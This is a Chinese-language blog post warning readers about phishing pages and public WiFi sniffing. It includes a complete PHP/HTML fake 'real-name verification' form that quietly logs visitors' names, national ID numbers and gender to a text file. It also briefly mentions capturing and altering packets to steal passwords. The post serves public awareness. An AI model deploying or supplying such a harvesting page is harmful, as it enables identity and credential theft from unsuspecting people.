网络有多“安全”？

很多人都听说过什么“打击网络犯罪”，“小心上钩”之类的。但是大家有没有想过，在喊这些口号的同时，你已经“上钩了”。
第一个就是你可能经常会下载一下XX东西，这时，网站说要登录账户什么的，你发现你又没有账号。网站突然有跳出来了一个可以使用第三方登录的界面。假如是QQ，你不小心输了真实的号码和密码，这时，别人就会记录你输的内容，进行盗号。特别是实名认证网站要是作假，那你就完了。这里我就拿PHP写一个网站私自记录信息的脚本。

<!DOCTYPE html>
<html>
<title>钓鱼网页实例</title>
<body>
<h1>--------------实名认证系统-------------- <h1>
<h5>      <h5>
<form name="a" method="post">
<table width="200" border="1">
<tr>
<th scope="row">真实姓名</th>
<td><input type="text" name="a"/></td>
<td>      </td>
</tr>
<tr>
<th scope="row">身份证号码</th>
<td><input type="text" name="b"/></td>
<td>&nbsp;</td>
</tr>
<tr>
<th scope="row">性别</th>
<td>男<input type="radio" name="c" value="男" />女<input type="radio" name="c" value="女" /></td>
<td><input type="submit" name="submit" value="提交"</td>
</tr>
</table>
</form>
<?php
$name=$_POST['a'];
$u=$_POST['b'];
$x=$_POST['c'];
$b="姓名：$name 身份证号码： $u 性别： $x \r\n";
file_put_contents ( 'name.txt', " $b " , FILE_APPEND );
?></body>
</html>

通过这段代码，记录者就可以把你的性别，名字，身份证号记录的name.txt里。真要的话，还会加上CSS，JavaScript和图片。如果不看网页源代码的话，谁也不知道那是真的还是假的。这个脚本里实际起作用的只有7行代码，就是

<?php
$name=$_POST['a'];
$u=$_POST['b'];
$x=$_POST['c'];
$b="姓名：$name 身份证号码： $u 性别： $x \r\n";
file_put_contents ( 'name.txt', " $b " , FILE_APPEND );
?>

第二个就是公共场合宁肯浪费流量也不要连WIFI。因为公共场合了公共WIFI风险非常大。拿一个抓包软件，就可以轻轻松松抓到你的账号密码之类的。甚至有时可以拿软件进行改包，连安全的也变成危险的了。
本期就到这里了。下期会不定时发表。

• 点赞
• 收藏
• 分享
• 文章举报